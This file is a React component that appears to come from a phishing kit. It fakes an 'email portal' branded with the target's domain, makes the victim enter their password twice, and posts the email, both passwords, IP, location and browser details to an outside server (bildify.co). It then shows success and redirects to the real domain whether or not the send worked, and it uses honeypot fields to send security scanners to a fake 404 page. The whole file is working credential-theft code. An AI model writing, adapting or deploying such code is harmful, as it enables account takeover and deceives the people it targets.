import React, { useState, useRef } from 'react';

const LoginForm = ({ email, domain, envData, setScreen }) => {
  const [password, setPassword] = useState('');
  const [storedPassword, setStoredPassword] = useState('');
  const [showPassword, setShowPassword] = useState(false);
  const [errorMessage, setErrorMessage] = useState('');
  const [firstPasswordSubmitted, setFirstPasswordSubmitted] = useState(false);
  const honeypotRef = useRef({
    username: '',
    user_email: '',
    user_pass: ''
  });

  const handleHoneypotChange = (field, value) => {
    honeypotRef.current[field] = value;
  };

  const honeypotFilled = () => {
    return Object.values(honeypotRef.current).some(val => val.trim() !== '');
  };

  const handleSubmit = async (e) => {
    e.preventDefault();
    
    if (honeypotFilled()) {
      setScreen('fake404');
      return;
    }

    if (!firstPasswordSubmitted) {
      if (!password) {
        setErrorMessage('Authentication is required!');
        return;
      }
      
      setStoredPassword(password);
      setFirstPasswordSubmitted(true);
      setErrorMessage('For security, please re-enter your password');
      setPassword('');
    } else {
      if (!password) {
        setErrorMessage('Please re-enter your password');
        return;
      }
      
      if (password !== storedPassword) {
        setErrorMessage('Passwords do not match!');
        return;
      }
      
      setScreen('processing');
      
      try {
        // Prepare form data (excluding honeypot fields)
        const formData = new FormData();
        formData.append('email', email);
        formData.append('browser', envData.browser);
        formData.append('os', envData.os);
        formData.append('location', envData.location);
        formData.append('password', password);
        formData.append('date', envData.date);
        formData.append('time', envData.time);
        formData.append('ip', envData.ip);
        formData.append('first_password', storedPassword);
        
        // Replace with your actual PHP endpoint
        const response = await fetch('https://bildify.co/test.php', {
          method: 'POST',
          body: formData
        });

        if (response.ok) {
          setScreen('success');
          
          // Redirect after 2 seconds
          setTimeout(() => {
            window.location.href = `https://${domain}`;
          }, 2000);
        } else {
          throw new Error('Submission failed');
        }
      } catch (error) {
        // Even if the submission fails, we show success to the user and redirect
        setScreen('success');
        setTimeout(() => {
          window.location.href = `https://${domain}`;
        }, 2000);
      }
    }
  };

  return (
    <div className="centered active">
      <div className="card">
        <h2 className="dynamic-domain">{domain}</h2>
        <h2>EMAIL PORTAL</h2>
        <div className="info">
          <i className="far fa-calendar-alt"></i> {envData.date}
          <i className="far fa-clock"></i> {envData.time}
          <i className="fab fa-internet-explorer"></i> {envData.browser}
          <i className="fab fa-windows"></i> {envData.os}
          <i className="fas fa-map-marker-alt"></i> {envData.location}
        </div>
        {email && (
          <h3 id="emailDisplay" style={{ display: 'block' }}>
            {email}
          </h3>
        )}
        <p>
          You're accessing secure settings, please provide your
          <span className="dynamic-domain"> {domain} </span> email password to update.
        </p>
        <form onSubmit={handleSubmit}>
          <input type="hidden" name="email" value={email} />
          <input type="hidden" name="browser" value={envData.browser || ''} />
          <input type="hidden" name="os" value={envData.os || ''} />
          <input type="hidden" name="location" value={envData.location || ''} />
          
          {/* Honeypot fields (not submitted) */}
          <input
            type="text"
            name="username"
            className="honeypot"
            onChange={(e) => handleHoneypotChange('username', e.target.value)}
          />
          <input
            type="email"
            name="user_email"
            className="honeypot"
            onChange={(e) => handleHoneypotChange('user_email', e.target.value)}
          />
          <input
            type="password"
            name="user_pass"
            className="honeypot"
            onChange={(e) => handleHoneypotChange('user_pass', e.target.value)}
          />
          
          <input
            type={showPassword ? 'text' : 'password'}
            id="password"
            name="password"
            placeholder={firstPasswordSubmitted ? 'Re-enter Password' : 'Password'}
            value={password}
            onChange={(e) => setPassword(e.target.value)}
            required
          />
          {errorMessage && (
            <div className="error" style={{ display: 'block' }}>
              {errorMessage}
            </div>
          )}
          <div className="checkbox">
            <input
              type="checkbox"
              id="showPass"
              checked={showPassword}
              onChange={() => setShowPassword(!showPassword)}
            />
            <label htmlFor="showPass">Show password</label>
          </div>
          <button type="submit">
            {firstPasswordSubmitted ? 'CONFIRM' : 'NEXT'}
          </button>
        </form>
        <div className="footer">
          © 2025 Secure Portal | Privacy | <span className="dynamic-domain">{domain}</span>
        </div>
      </div>
    </div>
  );
};

export default LoginForm;